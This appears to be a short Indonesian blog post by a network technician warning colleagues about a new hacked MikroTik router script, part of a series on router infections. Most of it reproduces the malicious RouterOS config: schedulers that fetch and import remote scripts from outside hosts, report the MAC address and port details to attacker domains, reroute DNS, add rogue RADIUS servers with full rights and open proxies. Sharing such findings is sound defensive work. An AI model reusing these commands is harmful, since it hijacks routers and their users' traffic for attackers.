email : ariyaandro@gmail.com
post yang lalu yaitu :
Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia
Mikrotik : Wabah september 2018
Mikrotik : Wabah Oktober 2018
update temuan script hacked yang baru lagi,…
/system scheduleradd interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\han.pythonanywhere.com/\" dst-path=tmp} on-error={:put \"get http error\"}\;\r\\n/import tmp;\r\\n/file remove tmp;" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\mar/31/2018 start-time=20:21:00/system scriptadd name=script4_ owner=xxx policy=\ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ddress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\lt=no"
/ip dnsset allow-remote-requests=yes servers="94.247.43.254,1\07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141"/ip firewall natadd action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \src-address-list=!Ok to-ports=8080/ip proxyset cache-path=web-proxy1 enabled=yes/ip serviceset telnet disabled=yesset ftp disabled=yesset ssh disabled=yesset api disabled=yesset winbox disabled=yes port=40527set api-ssl disabled=yes/ip socksset enabled=yes port=30526/ppp aaaset use-radius=yes/radiusadd address=45.79.109.133 secret=test service=ppp,login,dhcpadd address=139.162.71.145 secret=test service=ppp,login,dhcpadd address=128.199.172.32 secret=test service=ppp,login,dhcpadd address=178.128.214.44 secret=test service=ppp,login,dhcp/radius incomingset accept=yes port=1700/user aaaset default-group=full use-radius=yes/system scheduleradd interval=10m name="DDNS Serv" on-event="/system script run iDDNS" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startupadd interval=20m name="DDNS Backup" on-event=":global mac [/interface ethernet\\_get 0 mac-address]\r\\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\\"_\".[/ip proxy get port])\r\\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\\n:do {/tool fetch address=azdns.ru src-path=\$cmd mode=http dst-path=dns}\\_on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pat\h=dns}\r\\n:delay 3s;/import dns;:delay 4s;/file remove dns" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startupadd interval=1d name="DDNS reLoad" on-event=":do {/tool fetch url=http://src.c\lick/error.html mode=http dst-path=flash/webproxy/error.html;/tool fetch u\rl=http://src.click/error.html mode=http dst-path=webproxy/error.html} on-\error={/tool fetch url=http://priv.su/error.html mode=http dst-path=flash/\webproxy/error.html;/tool fetch url=http://priv.su/error.html mode=http ds\t-path=webproxy/error.html}" policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\startup/system scriptadd name=iDDNS owner=adminuser policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\\_mac [/interface ethernet get 0 mac-address]\r\\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\\"_\".[/ip proxy get port])\r\\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled])\r\\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\\n:do {/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dn\s} on-error={/tool fetch address=src.click src-path=\$cmd mode=http dst-pa\th=dns}\r\\n:delay 3s;/import dns;:delay 4s;/file remove dns"
soooo, jangan kelupa cek2 config lainnya ya.
salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis
email : ariyaandro@gmail.com
Komentar
Posting Komentar